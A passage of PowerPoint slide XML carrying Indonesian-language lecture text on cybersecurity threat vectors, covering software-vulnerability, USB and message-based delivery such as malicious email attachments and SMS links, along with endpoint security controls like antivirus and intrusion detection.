              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengeditan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Vektor-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengekspos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beragam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mulai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> USB dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> flash yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelajahi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengedit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, antivirus, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1276408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Vektor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pesan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>iming-iming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelabui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengiriman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lampiran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lampiran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelabui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lampiran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Short Message Service (SMS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firmware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ponsel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
